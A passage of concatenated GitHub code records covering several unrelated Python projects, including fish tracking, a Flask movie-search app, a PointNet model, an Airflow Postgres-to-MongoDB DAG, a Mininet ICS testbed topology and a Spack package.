4] + np.pi, np.pi * 2) - np.pi\r\n )\r\n\r\n return np.sum(dists**2) < n_px**2 and dtheta < d_theta\r\n\r\n\r\n@jit(nopython=True)\r\ndef points_to_angles(points):\r\n angles = np.empty(len(points) - 1, dtype=np.float64)\r\n for i, (p1, p2) in enumerate(zip(points[0:-1], points[1:])):\r\n angles[i] = np.arctan2(p2[1] - p1[1], p2[0] - p1[0])\r\n return angles\r\n\r\n\r\n@jit(nopython=True)\r\ndef fish_start(mask, take_min):\r\n su = 0.0\r\n ret = np.full((2,), 0.0)\r\n for i in range(mask.shape[0]):\r\n for j in range(mask.shape[1]):\r\n if mask[i, j] > take_min:\r\n dm = mask[i, j] - take_min\r\n ret[1] += dm * i\r\n ret[0] += dm * j\r\n su += dm\r\n\r\n if su > 0.0:\r\n return ret / su\r\n else:\r\n ret[:] = -1\r\n return ret\r\n\r\n\r\n# Utilities for drawing circles.\r\n\r\n\r\n@jit(nopython=True)\r\ndef _symmetry_points(x0, y0, x, y):\r\n return [\r\n (x0 + x, y0 + y),\r\n (x0 - x, y0 + y),\r\n (x0 + x, y0 - y),\r\n (x0 - x, y0 - y),\r\n (x0 + y, y0 + x),\r\n (x0 - y, y0 + x),\r\n (x0 + y, y0 - x),\r\n (x0 - y, y0 - x),\r\n ]\r\n\r\n\r\n@jit(nopython=True)\r\ndef _circle_points(x0, 
y0, radius):\r\n \"\"\"Bresenham's circle algorithm\r\n\r\n Parameters\r\n ----------\r\n xc : center x\r\n yc : center y\r\n r : radius\r\n\r\n Returns\r\n -------\r\n a list of points\r\n\r\n \"\"\"\r\n f = 1 - radius\r\n ddf_x = 1\r\n ddf_y = -2 * radius\r\n x = 0\r\n y = radius\r\n points = [\r\n (x0, y0 + radius),\r\n (x0, y0 - radius),\r\n (x0 + radius, y0),\r\n (x0 - radius, y0),\r\n ]\r\n while x < y:\r\n if f >= 0:\r\n y -= 1\r\n ddf_y += 2\r\n f += ddf_y\r\n x += 1\r\n ddf_x += 2\r\n f += ddf_x\r\n points.extend(_symmetry_points(x0, y0, x, y))\r\n return points\r\n\r\n\r\n@jit(nopython=True)\r\ndef _fish_direction_n(image, start_loc, radius):\r\n centre_int = start_loc.astype(np.int16)\r\n pixels_rad = _circle_points(centre_int[0], centre_int[1], radius)\r\n max_point = pixels_rad[0]\r\n max_val = 0\r\n h, w = image.shape\r\n for x, y in pixels_rad:\r\n if x < 0 or y < 0 or x >= w or y >= h:\r\n continue\r\n if image[y, x] > max_val:\r\n max_val = image[y, x]\r\n max_point = (x, y)\r\n return np.arctan2(max_point[1] - centre_int[1], max_point[0] - centre_int[0])\r\n\r\n\r\n@jit(nopython=True)\r\ndef _minimal_angle_dif(th_old, th_new):\r\n return th_old + np.mod(th_new - th_old + np.pi, np.pi * 2) - np.pi\r\n","repo_name":"portugueslab/stytra","sub_path":"stytra/tracking/fish.py","file_name":"fish.py","file_ext":"py","file_size_in_byte":14928,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"73"} +{"seq_id":"33871607673","text":"from flask import render_template, request, flash, redirect, url_for\nfrom app import app, models\nfrom app.forms import SearchForm, ResultForm\nfrom app import db\nfrom app.models import result\nimport requests\nimport json\nimport urllib.request as pull \n\n@app.route('/')\n@app.route('/index') \ndef index():\n form = SearchForm()\n # clearing the database of existing data to avoid duplicates\n db.session.query(result).delete()\n db.session.commit()\n return render_template('index.html', title='Home', form=form)\n\n@app.route('/search', methods=[\"GET\",\"POST\"], defaults={\"page\":1})\n@app.route(\"/search/\", methods=[\"GET\"])\ndef search(page):\n form = ResultForm()\n if request.method =='POST':\n # receives the incoming POST request from the form and turns it into text\n text = request.form['text'] \n # processes the text into a string format to add to the API query string\n results = _return_json(text) \n if results is False:\n flash(\"No results found, please enter new search terms\")\n return redirect(\"/index\")\n search_results = results.paginate(page, app.config[\"RESULTS_PER_PAGE\"], False)\n next_url = url_for('search', page=search_results.next_num) if search_results.has_next else None\n prev_url = url_for('search', page=search_results.prev_num) if search_results.has_prev else None\n return render_template('search.html', title=\"Results\", results=search_results.items, form=form, next_url=next_url, prev_url=prev_url)\n else:\n results = db.session.query(result).paginate(page, app.config[\"RESULTS_PER_PAGE\"], False)\n next_url = url_for('search', page=results.next_num) if results.has_next else None\n prev_url = url_for('search', page=results.prev_num) if results.has_prev else None\n return render_template('search.html', title=\"Results\", results=results.items, form=form, next_url=next_url, prev_url=prev_url)\n\n@app.route('/details', methods=[\"POST\"])\ndef details():\n text_id = request.form['imdbID']\n to_be_returned_from_OMDB =\"https://www.omdbapi.com/?i=\"+text_id+\"&apikey=e3c04726\"\n 
with pull.urlopen(to_be_returned_from_OMDB) as response:\n source = response.read()\n data = json.loads(source)\n movie_title = data[\"Title\"]\n year = data[\"Year\"]\n released = data[\"Released\"]\n runtime = data[\"Runtime\"]\n genre = data[\"Genre\"]\n director = data[\"Director\"]\n poster = data[\"Poster\"]\n return render_template('movie_detail.html', movie_title=movie_title, year=year, released=released, runtime=runtime, genre=genre,director=director,poster=poster)\n\ndef _return_json(text):\n \"\"\"function for addiing json object results to db depending on result amount and returning a SQLAlchemy object\"\"\"\n # starts of by getting the url for the first page of results \n url_string = _string_to_url(text, 1)\n # stores the JSON object from the api as a python dictionary\n with pull.urlopen(url_string) as response:\n source = response.read()\n data = json.loads(source)\n \n if data[\"Response\"] == \"False\":\n # if the json object found no results, then redirect back to the home search screen\n return False \n # otherwise, if response is at least one ...\n else:\n total_results = int(data[\"totalResults\"])\n total_pages = total_results // 10\n if total_pages >= 5:\n for i in range(1,6):\n url_string = _string_to_url(text,i)\n _add_to_db(url_string)\n return db.session.query(result)\n else:\n for i in range(1,total_pages + 1):\n url_string = _string_to_url(text,i)\n _add_to_db(url_string)\n return db.session.query(result)\n\ndef _string_to_url(text, num):\n \"\"\"function for converting text to a url for omdb api\n param: text string\n param: specific page number of total results to return\"\"\"\n text_two = text.split()\n processed = \"+\".join(text_two)\n to_be_returned_from_OMDB =\"https://www.omdbapi.com/?s=\"+processed+\"&page=\"+str(num)+\"&apikey=e3c04726\"\n return to_be_returned_from_OMDB\n\ndef _add_to_db(url_string):\n \"\"\" helper function for _return_json function that adds json object results to database (db)\"\"\"\n\n # uses the 'urllib.request as pull' to open the url as a response and then open as a dictionary with data\n with pull.urlopen(url_string) as response:\n source = response.read()\n data = json.loads(source)\n search_list = data[\"Search\"]\n for movie in search_list:\n result1 = result(imdbID=movie[\"imdbID\"], title=movie[\"Title\"], year=movie[\"Year\"])\n db.session.add(result1)\n db.session.commit()\n","repo_name":"willdevgar/OMDBmoviesite","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"348572129","text":"# pip install kaggle-environments --upgrade -q\nfrom collections import defaultdict, namedtuple\nimport random\n\nclass Arm:\n # An arm needs to remember the relevant history:\n # - when my opponent selected it\n # - when I selected it, with the reward I got\n def __init__(self, i):\n self.i = i\n self.my_actions_and_rewards = {} # step number to reward\n self.opponent_actions = set() # step number when my opponent chose it\n def __repr__(self):\n if len(self.my_actions_and_rewards) == 0 and len(self.opponent_actions) == 0:\n return ''\n return repr(dict(\n me = list(sorted(self.my_actions_and_rewards.items())),\n op = list(self.opponent_actions),\n ))\n\nO = namedtuple('O', 'remainingOverageTime step agentIndex reward lastActions')\n\nallActions = []\nmy_total_reward = 0\nmy_rewards = []\n\narms = [Arm(i) for i in range(100)]\n\ndef random_agent(observation, configuration):\n \n o = 
O(**observation)\n # print(observation, configuration)\n if o.step == 0:\n # No option on the first round really\n return random.randrange(configuration.banditCount)\n\n global my_total_reward\n\n allActions.append(o.lastActions)\n my_last_action = allActions[-1][o.agentIndex]\n opponents_last_action = allActions[-1][1-o.agentIndex]\n\n # recording what happened\n my_last_reward = o.reward - my_total_reward\n my_rewards.append(my_last_reward)\n my_total_reward = o.reward\n arms[my_last_action].my_actions_and_rewards[o.step-1]=my_last_reward\n arms[opponents_last_action].opponent_actions.add(o.step-1)\n\n #print(my_total_reward, my_rewards), checks assumption you either get 1 or 0 reward\n assert 0 <= my_last_reward <= 1\n\n assert my_total_reward == sum(r for a in arms for r in a.my_actions_and_rewards.values())\n\n\n # Start taking action\n\n # If the last one worked, try it again\n if my_last_reward == 1:\n return my_last_action\n\n # If my opponent repeated himself, copy him\n if len(allActions) >= 2:\n op2 = allActions[-2][1-o.agentIndex]\n op1 = allActions[-1][1-o.agentIndex]\n assert op1 == opponents_last_action\n if op1 == op2:\n return op1\n\n\n # Anything I haven't selected yet\n unselected_by_me = [a.i for a in arms if len(a.my_actions_and_rewards) == 0]\n if len(unselected_by_me) > 0:\n return unselected_by_me[0]\n\n # Give up, random choice\n return random.randrange(configuration.banditCount)\n\n\"\"\"\nThis competition is modeled after the \"multi-armed bandit problem,\" a classic probability-based, reinforcement learning problem that examines the exploration-exploitation tradeoff dilemma.\n\nIn this problem, both participants will work with the same set of 100 vending machines (bandits).\nEach bandit provides a random reward based on a probability distribution specific to that machine.\nEvery round each player selects (\"pulls\") a bandit,\nthe likelihood of a reward decreases by 3%.\n\nEach agent can see the move of the other agent, but will not see whether a reward was gained in their respective bandit pull.\n\nThis episode continues for 2000 rounds per player (4000 pulls total).\n\n\nAn Agent will receive an observation containing their total reward,\nthe bandits pulled by both players in the previous turn (lastActions),\nthe current step of the competition,\nand the remainingOverageTime.\n\"\"\"\n","repo_name":"Veganveins/candy_canes","sub_path":"basic_v2.py","file_name":"basic_v2.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"26965514184","text":"from __future__ import print_function\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.utils.data\nfrom torch.autograd import Variable\nimport numpy as np\nimport torch.nn.functional as F\n\n\nclass STN_input(nn.Module):\n def __init__(self, num_points = 4096):\n super(STN_input, self).__init__()\n self.num_points = num_points\n self.conv1 = nn.Conv1d(4, 64, 1)\n self.conv2 = nn.Conv1d(64, 128, 1)\n self.conv3 = nn.Conv1d(128, 1024, 1)\n self.fc1 = nn.Linear(1024, 512)\n self.fc2 = nn.Linear(512, 256)\n self.fc3 = nn.Linear(256, 16)\n\n self.bn1 = nn.BatchNorm1d(64)\n self.bn2 = nn.BatchNorm1d(128)\n self.bn3 = nn.BatchNorm1d(1024)\n self.bn4 = nn.BatchNorm1d(512)\n self.bn5 = nn.BatchNorm1d(256)\n\n\n def forward(self, x):\n batchsize = x.size()[0]\n x = F.relu(self.bn1(self.conv1(x)))\n x = F.relu(self.bn2(self.conv2(x)))\n x = F.relu(self.bn3(self.conv3(x)))\n x = F.max_pool1d(x, 
self.num_points)\n x = x.view(-1, 1024)\n\n x = F.relu(self.bn4(self.fc1(x)))\n x = F.relu(self.bn5(self.fc2(x)))\n x = self.fc3(x)\n\n iden = Variable(torch.from_numpy(np.eye(4).astype(np.float32))).view(1,4*4).repeat(batchsize,1)\n if x.is_cuda:\n iden = iden.cuda()\n x = x + iden\n x = x.view(-1, 4, 4)\n return x\n\nclass STN_feature(nn.Module):\n def __init__(self, num_points = 4096):\n super(STN_feature, self).__init__()\n self.num_points = num_points\n self.conv1 = nn.Conv1d(64, 64, 1)\n self.conv2 = nn.Conv1d(64, 128, 1)\n self.conv3 = nn.Conv1d(128, 1024, 1)\n self.fc1 = nn.Linear(1024, 512)\n self.fc2 = nn.Linear(512, 256)\n self.fc3 = nn.Linear(256, 64*64)\n\n self.bn1 = nn.BatchNorm1d(64)\n self.bn2 = nn.BatchNorm1d(128)\n self.bn3 = nn.BatchNorm1d(1024)\n self.bn4 = nn.BatchNorm1d(512)\n self.bn5 = nn.BatchNorm1d(256)\n\n def forward(self, x):\n batchsize = x.size()[0]\n x = F.relu(self.bn1(self.conv1(x)))\n x = F.relu(self.bn2(self.conv2(x)))\n x = F.relu(self.bn3(self.conv3(x)))\n x = F.max_pool1d(x, self.num_points)\n x = x.view(-1, 1024)\n\n x = F.relu(self.bn4(self.fc1(x)))\n x = F.relu(self.bn5(self.fc2(x)))\n x = self.fc3(x)\n\n iden = Variable(torch.from_numpy(np.eye(64).astype(np.float32))).view(1,64*64).repeat(batchsize,1)\n if x.is_cuda:\n iden = iden.cuda()\n x = x + iden\n x = x.view(-1, 64, 64)\n return x\n\n\nclass PointNetSeg(nn.Module):\n def __init__(self, num_points = 4096, num_classes = 8):\n super(PointNetSeg, self).__init__()\n self.num_classes = num_classes\n self.num_points = num_points\n self.stn1 = STN_input(num_points = self.num_points)\n self.stn2 = STN_feature(num_points = self.num_points)\n self.conv1 = nn.Conv1d(4, 64, 1)\n self.conv2 = nn.Conv1d(64, 64, 1)\n self.conv3 = nn.Conv1d(64, 64, 1)\n self.conv4 = nn.Conv1d(64, 128, 1)\n self.conv5 = nn.Conv1d(128, 1024, 1)\n self.conv6 = nn.Conv1d(1088, 512, 1)\n self.conv7 = nn.Conv1d(512, 256, 1)\n self.conv8 = nn.Conv1d(256, 128, 1)\n self.conv9 = nn.Conv1d(128, 128, 1)\n self.bn1 = nn.BatchNorm1d(64)\n self.bn2 = nn.BatchNorm1d(64)\n self.bn3 = nn.BatchNorm1d(64)\n self.bn4 = nn.BatchNorm1d(128)\n self.bn5 = nn.BatchNorm1d(1024)\n self.bn6 = nn.BatchNorm1d(512)\n self.bn7 = nn.BatchNorm1d(256)\n self.bn8 = nn.BatchNorm1d(128)\n self.bn9 = nn.BatchNorm1d(128)\n self.dropout = nn.Dropout(0.3)\n self.cls = nn.Conv1d(128, self.num_classes, 1)\n\n def set_num_points(self, num_points):\n self.num_points = num_points\n self.stn1.num_points = num_points\n self.stn2.num_points = num_points\n\n\n\n def forward(self, x):\n batchsize = x.size()[0]\n\n # input transform\n trans1 = self.stn1(x)\n x = x.transpose(2,1)\n x = torch.bmm(x, trans1)\n x = x.transpose(2,1)\n\n # point feature extractor\n x = F.relu(self.bn1(self.conv1(x)))\n x = F.relu(self.bn2(self.conv2(x)))\n\n # feature transform\n trans2 = self.stn2(x)\n x = x.transpose(2,1)\n x = torch.bmm(x, trans2)\n x = x.transpose(2,1)\n\n pointfeat = x\n\n # global feature extractor\n x = F.relu(self.bn3(self.conv3(x)))\n x = F.relu(self.bn4(self.conv4(x)))\n x = F.relu(self.bn5(self.conv5(x)))\n globalfeat = F.max_pool1d(x, self.num_points)\n globalfeat = globalfeat.view(-1, 1024, 1).repeat(1, 1, self.num_points)\n\n x = torch.cat([pointfeat, globalfeat], 1)\n x = F.relu(self.bn6(self.conv6(x)))\n x = F.relu(self.bn7(self.conv7(x)))\n x = F.relu(self.bn8(self.conv8(x)))\n x = F.relu(self.bn9(self.conv9(x)))\n\n # classfier\n x = self.dropout(x)\n x = self.cls(x)\n # (B*C*N) -> (B*N*C)\n x = x.transpose(2, 1).contiguous()\n x = F.log_softmax(x, -1)\n return 
x\n\n\n\nif __name__ == '__main__':\n inputdata = Variable(torch.rand(2,4,2048))\n seg = PointNetSeg(num_points=2048)\n out= seg(inputdata)\n print('seg', out.size())","repo_name":"SmallHedgehog/points_seg","sub_path":"model/pointnet.py","file_name":"pointnet.py","file_ext":"py","file_size_in_byte":5377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"30901390375","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import simps\nfrom colossus.cosmology import cosmology\nfrom scipy.special import spherical_jn as spjn\nfrom scipy.interpolate import interp2d\nfrom pqdm.processes import pqdm\n\ndef ConeBand(alpha = np.pi/3, N=10**5):\n \n R = np.random.uniform(0,1,N)**(1/3)\n t = np.arccos(np.random.uniform(-1,1, N))\n p = np.random.uniform(0, 2*np.pi, N)\n\n x = R*np.cos(p)*np.sin(t)\n y = R*np.sin(p)*np.sin(t)\n z = R*np.cos(t)\n\n cones = (t < alpha) | (t > np.pi-alpha)\n\n conex = x[cones]; coney = y[cones]; conez = z[cones]; coner = R[cones]\n bandx = x[np.invert(cones)]; bandy = y[np.invert(cones)]; bandz = z[np.invert(cones)]; bandr = R[np.invert(cones)]\n \n return conex, coney, conez, bandx, bandy, bandz\n\n\ndef delta(r, t, p): \n return r*np.array([np.sin(t)*np.cos(p), np.sin(t)*np.sin(p),np.cos(t)]).reshape(1,3)\n\ndef InCone(pos, alpha = np.pi/3):\n \n # Unpack Cartesian\n x, y, z = pos.T\n \n # Compute distance from origin\n r = np.sqrt(x*x + y*y + z*z)\n \n # Compute angle wrt z-axis\n theta = np.arccos(z/r)\n \n # Check if incone\n incone = (theta <= alpha) | (theta >= (np.pi - alpha))\n \n # Also check if in sphere\n alsoinsphere = incone & (r < 1)\n \n return alsoinsphere.mean()\n\ndef InBand(pos, alpha = np.pi/3):\n \n # Unpack Cartesian\n x, y, z = pos.T\n \n # Compute distance from origin\n r = np.sqrt(x*x + y*y + z*z)\n \n # Compute angle wrt z-axis\n theta = np.arccos(z/r)\n \n # Check if inband\n inband = (theta >= alpha) & (theta <= (np.pi - alpha))\n \n # Also check if in sphere\n alsoinsphere = inband & (r < 1)\n \n return alsoinsphere.mean()\n \n\n#def fraction(r, t, p, alpha = np.pi/3, N=10**5):\ndef fraction(args):\n \n r, t, p, alpha, N = args\n\n from time import time \n start = time()\n \n conex, coney, conez, bandx, bandy, bandz = ConeBand(alpha, N=N)\n \n newcone = np.array([conex, coney, conez]).T + delta(r,t,p)\n newband = np.array([bandx, bandy, bandz]).T + delta(r,t,p)\n \n results = InCone(newcone, alpha), InBand(newband, alpha)\n \n return results\n\n\nif __name__ == \"__main__\":\n\n\n ds = np.linspace(0,2,100)\n ts = np.linspace(0,np.pi/2,100)\n args = [(d,t,0,np.pi/3, 10**7) for d in ds for t in ts]\n results = np.array(pqdm(args, fraction, 8))\n \n\n coneresults, bandresults = results.T\n coneresults = coneresults.reshape(len(ds),len(ts)).T\n bandresults = bandresults.reshape(len(ds),len(ts)).T\n\n np.save('ConeWeightFunction', coneresults)\n np.save('BandWeightFunction', bandresults)\n\n\n bandinterpolator = interp2d(ds, ts, bandresults)\n coneinterpolator = interp2d(ds, ts, coneresults)\n\n dmesh, tmesh = np.meshgrid(ds, ts)\n\n # Verify that the interpolating order is the same\n plt.figure(figsize=(16,8))\n plt.subplot(121)\n plt.imshow(coneresults, extent=(ds.min(),ds.max(),ts.min(),ts.max()), aspect='auto')\n plt.subplot(122)\n plt.imshow(coneinterpolator(ds, ts), extent=(ds.min(),ds.max(),ts.min(),ts.max()), aspect='auto')\n plt.savefig('coneweight.png')\n\n plt.figure(figsize=(16,8))\n plt.subplot(121)\n plt.imshow(bandresults, 
extent=(ds.min(),ds.max(),ts.min(),ts.max()), aspect='auto')\n plt.subplot(122)\n plt.imshow(bandinterpolator(ds, ts), extent=(ds.min(),ds.max(),ts.min(),ts.max()), aspect='auto')\n plt.savefig('bandweight.png')\n","repo_name":"alvarozamora/APkNNLinearTheory","sub_path":"GenerateConeBandInterpolator.py","file_name":"GenerateConeBandInterpolator.py","file_ext":"py","file_size_in_byte":3447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"10369959995","text":"\nimport time\nfrom pprint import pprint\n\nfrom airflow import DAG\nfrom airflow.operators.python import PythonOperator, PythonVirtualenvOperator\nfrom airflow.operators.bash import BashOperator\nfrom airflow.utils.dates import days_ago\nimport psycopg2\nfrom sqlalchemy import create_engine,Table, Column, Integer, String, MetaData,Date\nimport pandas as pd\n\nargs = {\n 'owner': 'airflow',\n}\n\nwith DAG(\n dag_id='DanaEstetieh',\n default_args=args,\n schedule_interval=None,\n start_date=days_ago(2),\n tags=['Q2DE'],\n) as dag:\n\n task1 = BashOperator(\n task_id='ExtractCSV',\n bash_command=\"pip install pymongo\",\n )\n\n def load_CSVfile(**kwargs):\n host=\"de_postgres\" \n database=\"psql_data_environment\"\n user=\"psql_user\"\n password=\"psql\"\n port='5432'\n engine = create_engine(f'postgresql://{user}:{password}@{host}:{port}/{database}')\n tablename=\"client_list\"\n rdf = pd.read_sql_table(\n tablename,\n con=engine\n )\n import json\n jsonfile=rdf.to_json(orient='records')\n with open('data.json', 'w') as file:\n json.dump(jsonfile, file)\n return 'Success'\n\n task2 = PythonOperator(\n task_id='load_CSVfile',\n python_callable=load_CSVfile,\n )\n def load_mongodb(**kwargs):\n from pymongo import MongoClient\n import json\n\n client = MongoClient(\"mongodb://mongopsql:mongo@de_mongo:27017\")\n\n db = client[\"DE\"]\n\n Collection = db[\"dataset\"]\n\n with open('data.json') as file:\n file_data = json.load(file)\n listfile=json.loads(file_data)\n Collection.insert_many(listfile)\n\n return 'Success'\n\n task3 = PythonOperator(\n task_id='load_mongodb',\n python_callable=load_mongodb,\n )\n task1 >> task2 \n task2 >> task3","repo_name":"Danaestetieh/DE_Assigment1","sub_path":"DEQ2.py","file_name":"DEQ2.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"2209479236","text":"import codewars_test as test\nfrom solution import balanced_parens\n\n@test.describe(\"Fixed Tests\")\ndef fixed_tests():\n @test.it('Basic Test Cases')\n def ff():\n for n,exp in [ [0, [\"\"]],\n [1, [\"()\"]],\n [2, [\"(())\",\"()()\"]],\n [3, [\"((()))\",\"(()())\",\"(())()\",\"()(())\",\"()()()\"]]]:\n actual = balanced_parens(n)\n actual.sort()\n test.assert_equals(actual, exp)","repo_name":"oko-ha/codewars","sub_path":"All Balanced Parentheses/test_case.py","file_name":"test_case.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"31718504858","text":"\"\"\"\nswat-s1 topology\n\"\"\"\n\nfrom mininet.topo import Topo\n\nfrom utils import IP, MAC, NETMASK\n\n\nclass SwatTopo(Topo):\n\n \"\"\"SWaT 3 plcs + attacker + private dirs.\"\"\"\n\n def build(self):\n\n switch = self.addSwitch('s1')\n\n plc1 = self.addHost(\n 'plc1',\n ip=IP['plc1'] + NETMASK,\n mac=MAC['plc1'])\n self.addLink(plc1, switch)\n\n plc2 = self.addHost(\n 'plc2',\n ip=IP['plc2'] + NETMASK,\n mac=MAC['plc2'])\n 
self.addLink(plc2, switch)\n\n plc3 = self.addHost(\n 'plc3',\n ip=IP['plc3'] + NETMASK,\n mac=MAC['plc3'])\n self.addLink(plc3, switch)\n\n attacker = self.addHost(\n 'attacker',\n ip=IP['attacker'] + NETMASK,\n mac=MAC['attacker'])\n self.addLink(attacker, switch)\n","repo_name":"scy-phy/minicps","sub_path":"examples/swat-s1/topo.py","file_name":"topo.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":148,"dataset":"github-code","pt":"73"} +{"seq_id":"72188558317","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.optimize import curve_fit\n\n# lon0, lat0 = 35.650798, 139.779477\nlon0, lat0 = 38.721527, 141.092104\nr = 6378.137*1000\ndata_path='data_6_16_2.csv'\ndata = pd.read_csv(data_path, names=['RSSI','LONGITUDE', 'LATITUDE'], sep=',')\n\ndata['DISTANCE'] = r*np.arccos(np.sin(lat0*np.pi/180)*np.sin(data['LATITUDE']*np.pi/180)+np.cos(lat0*np.pi/180)*np.cos(data['LATITUDE']*np.pi/180)*np.cos(lon0*np.pi/180-data['LONGITUDE']*np.pi/180))\n\nx=data[['DISTANCE']]\ny=data[['RSSI']]\n\ndef func(x, a, b):\n return a + b * np.log10(x)\n\ndef func_theory(x):\n return 13 - 20*np.log10(4*np.pi*x*921.2*10**6/299792458)\n\nx = x.to_numpy()[:, 0]\ny = y.to_numpy()[:, 0]\n\ny_theory = func_theory(x)\n\npopt, pcov = curve_fit(func,x,y) \nprint(\"y=\"+str(popt[0])+str(popt[1])+\"*log10(x)\")\ny_pred = func(x, popt[0], popt[1])\nplt.plot(x,y_pred,color=\"red\")\nplt.plot(x,y_theory,color=\"green\")\n\nplt.scatter(x,y)\nplt.xlabel(\"Distance from Tx(m)\")\nplt.ylabel(\"RSSI(dBm)\")\nplt.gca().get_xaxis().get_major_formatter().set_useOffset(False)\n# plt.legend([\"simulation\",\"measured value\",\"linear regression of measured value\"])\nplt.legend([\"fit curve\",\"theoretical value\",\"linear regression of measured value\"])\nprint(\"-122dBm at \"+str(int(np.exp((-122+57.035530363980186)/(-9.009988560782537))))+\"m\")\nprint(\"-132dBm at \"+str(int(np.exp((-132+57.035530363980186)/(-9.009988560782537))))+\"m\")","repo_name":"kazuyahirotsu/LoRa","sub_path":"project/GPS-visualization-Python/rssi_plot_scipy.py","file_name":"rssi_plot_scipy.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"37147247655","text":"import os\nfrom datetime import datetime\nimport csv\nimport re\nproetos = [\n \"Appium\"\n ,\"Bundler\"\n ,\"Candlepin\"\n ,\"Diaspora\"\n ,\"Hazelcast\"\n ,\"Kuma\"\n ,\"Marathon\"\n ,\"Metasploit Framework\"\n ,\"Meteor\"\n ,\"Nancy\"\n ,\"Netty\"\n ,\"Node\"\n ,\"Okhttp\"\n ,\"Pouchdb\"\n ,\"Pulp\"\n ,\"Rosdistro\"\n ,\"Scala IDE\"\n ,\"Scala JS\"\n ,\"Scikit\"\n ,\"Vagrant\"\n]\natributos = 
[\n\"created_at_week_day\"\n,\"created_at_day_turn\"\n,\"conflict\"\n,\"forward_links\"\n,\"intra_branch\"\n,\"description_length\"\n,\"num_commits\"\n,\"files_added\"\n,\"files_deleted\"\n,\"files_modified\"\n,\"files_changed\"\n,\"src_files\"\n,\"doc_files\"\n,\"other_files\"\n,\"src_churn\"\n,\"test_churn\"\n,\"new_entropy\"\n,\"entropy_diff\"\n,\"commits_on_files_touched\"\n,\"commits_to_hottest_file\"\n,\"hotness\"\n,\"at_mentions_description\"\n,\"at_mentions_comments\"\n,\"prev_pull_reqs_project\"\n,\"project_succ_rate\"\n,\"perc_external_contribs\"\n,\"sloc\"\n,\"test_lines_per_kloc\"\n,\"test_cases_per_kloc\"\n,\"asserts_per_kloc\"\n,\"stars\"\n,\"team_size\"\n,\"project_age\"\n,\"workload\"\n,\"ci\"\n,\"requester\"\n,\"prev_pullreqs\"\n,\"requester_succ_rate\"\n,\"followers\"\n,\"following\"\n,\"requester_age\"\n,\"main_team_member\"\n,\"watcher_project\"\n,\"req_follows_integrator\"\n,\"integrator_follows_req\"\n,\"prior_interaction_issue_events\"\n,\"prior_interaction_issue_comments\"\n,\"prior_interaction_pr_events\"\n,\"prior_interaction_pr_comments\"\n,\"prior_interaction_commits\"\n,\"prior_interaction_commit_comments\"\n,\"first_response\"\n]\n\ndef pegaValor(elem):\n return elem[0]\n \ndef printBest(lista):\n print(\"15 melhohres: \")\n for i in range(0,15):\n print(atributos.index(lista[i][1])+1, end=\", \")\n \nfile = open(\"resultados.csv\", \"r\",newline='')\ncsvFile = csv.reader(file, delimiter=';')\n# matriz = []\n# for registro in csvFile:\nregistros = []\nfor linha in csvFile:\n registro = []\n for i in range(0,52):\n registro.append((float(linha[i]),atributos[i]))\n registros.append(registro)\n \nfor j in range(14,20):\n registros[j].sort(reverse=True,key=pegaValor)\n print(str(proetos[j])+\":\")\n for i in range(0,52):\n print(str(i+1)+\" possição: \"+str(atributos.index(registros[j][i][1])+1)+\", nome: \"+str(registros[j][i][1])+\", valor: \"+str(registros[j][i][0]))\n print()\n printBest(registros[j])\n \n\n","repo_name":"mscmateus/tcc","sub_path":"TCC/experimentos3/scripts/best.py","file_name":"best.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"1913035854","text":"from spack.package import *\n\n\nclass PyJarowinkler(PythonPackage):\n \"\"\"library for fast approximate string matching using Jaro and Jaro-Winkler similarity.\"\"\"\n\n homepage = \"https://github.com/maxbachmann/JaroWinkler\"\n pypi = \"jarowinkler/jarowinkler-1.2.3.tar.gz\"\n\n maintainers(\"LydDeb\")\n\n version(\"1.2.3\", sha256=\"af28ea284cfbd1b21b29ff94b759f20e94e4f7c06f424b0b4702e701c2a21668\")\n\n depends_on(\"py-setuptools@42:\", type=\"build\")\n depends_on(\"py-scikit-build@0.15.0\", type=\"build\")\n depends_on(\"py-rapidfuzz-capi@1.0.5\", type=\"build\")\n","repo_name":"spack/spack","sub_path":"var/spack/repos/builtin/packages/py-jarowinkler/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":3712,"dataset":"github-code","pt":"73"} +{"seq_id":"27536585045","text":"# -*- coding: utf-8 -*-\n\nimport logging\n\nfrom odoo import api, fields, models\n\n_logger = logging.getLogger(__name__)\n\n\nclass InheritedResUsers(models.Model):\n _inherit = \"res.users\"\n\n default_shipping = fields.Selection(\n [\n (\"many\", \"Deliver products many times\"),\n (\"one\", \"Deliver all products at once\"),\n ],\n string=\"Default Shipping Progress\",\n default=\"one\",\n )\n sale_authorization_ids = 
